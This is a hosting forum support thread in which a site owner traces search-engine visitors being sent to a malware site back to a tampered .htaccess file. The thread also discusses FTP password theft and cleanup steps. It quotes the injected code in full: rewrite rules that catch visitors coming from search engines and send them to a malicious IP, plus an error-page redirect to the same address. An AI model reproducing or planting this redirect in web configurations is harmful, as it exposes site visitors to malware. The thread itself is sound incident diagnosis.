Page 2 of 2 FirstFirst 12
Results 11 to 18 of 18

Thread: Weird: Google search result for my site leads to virus-installing fake site

  1. #11
    Matt's Avatar
    Matt is online now GlowHost Administrator
    Join Date
    Jan 2005
    Location
    Behind your monitor
    Posts
    5,929

    Default

    Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.

    Regarding mail2forum, you could always have one written...
    Send your friends and site visitors to GlowHost and get $125 plus bonus!
    GlowHost Affiliate Program | Read our Blog | Follow us on X |

  2. #12
    omarfilip's Avatar
    omarfilip is offline Nearly a Master Glow Jedi
    Join Date
    Jan 2008
    Location
    Dallas, TX
    Posts
    127

    Default

    Found the culprit: the .htaccess file in the root was added or modified with this code:

    Code:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L]
    Errordocument 404 http://87.248.180.90/in.html?s=sg_err
    and the same file was also placed in the public_html folder.

    Good call on the redirection/referrer cause, Matt.

    Why was the intrusion allowed in the Root folder? I would think that phpBB doesn't have access to the Root folder?

    What can we do to prevent future occurrences?

  3. #13
    Matt's Avatar
    Matt is online now GlowHost Administrator
    Join Date
    Jan 2005
    Location
    Behind your monitor
    Posts
    5,929

    Default

    The logs seem to indicate that your FTP password was compromised. There are some newer exploits out there where a 3rd party site somehow managed to install a trojan on your PC and it sniffs out FTP passwords that have been saved on your PC, then sends them "home" and then "home" uploads all sorts of fun things from htaccess files to new scripts and the link.

    The best fix I have found is to run antivirus scans on all computers that you use to access the site via FTP. Once they are clean then change the main cPanel password to something impossible to guess, then setup ftp users for each machine that connects to the site via FTP.... e.g. laoptop@mydomain.com , desktop@mydomain.com , 3rdparty@mydomain.com etc.

    Tat way if and when it happens again we can tell you which ftp user was compromised from the logs and you can focus your efforts into figuring out what the security issue is on that unique machine.
    Send your friends and site visitors to GlowHost and get $125 plus bonus!
    GlowHost Affiliate Program | Read our Blog | Follow us on X |

  4. #14
    omarfilip's Avatar
    omarfilip is offline Nearly a Master Glow Jedi
    Join Date
    Jan 2008
    Location
    Dallas, TX
    Posts
    127

    Default

    McAfee scan came back clean. Running Avast scan now...will report results.

  5. #15
    omarfilip's Avatar
    omarfilip is offline Nearly a Master Glow Jedi
    Join Date
    Jan 2008
    Location
    Dallas, TX
    Posts
    127

    Default

    Avast scan came back clear as well. This is the only machine I use for FTP connections to my server.

    Any other ideas where the compromise might have occurred? Could there be a flaw in cPanel?

  6. #16
    Matt's Avatar
    Matt is online now GlowHost Administrator
    Join Date
    Jan 2005
    Location
    Behind your monitor
    Posts
    5,929

    Default

    Was the old password something easily guessed? I suppose the only other way they could get it is perhaps with a packet sniffer.
    Send your friends and site visitors to GlowHost and get $125 plus bonus!
    GlowHost Affiliate Program | Read our Blog | Follow us on X |

  7. #17
    omarfilip's Avatar
    omarfilip is offline Nearly a Master Glow Jedi
    Join Date
    Jan 2008
    Location
    Dallas, TX
    Posts
    127

    Default

    Not easy to guess at all. Where would the packet sniffer intercept my traffic?

  8. #18
    Matt's Avatar
    Matt is online now GlowHost Administrator
    Join Date
    Jan 2005
    Location
    Behind your monitor
    Posts
    5,929

    Default

    Anywhere on the Internet I suppose....

    how does a packet sniffer work - Google Search
    Send your friends and site visitors to GlowHost and get $125 plus bonus!
    GlowHost Affiliate Program | Read our Blog | Follow us on X |

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

1 2 3 4 5 6 7 8 9 10 11 12 13 14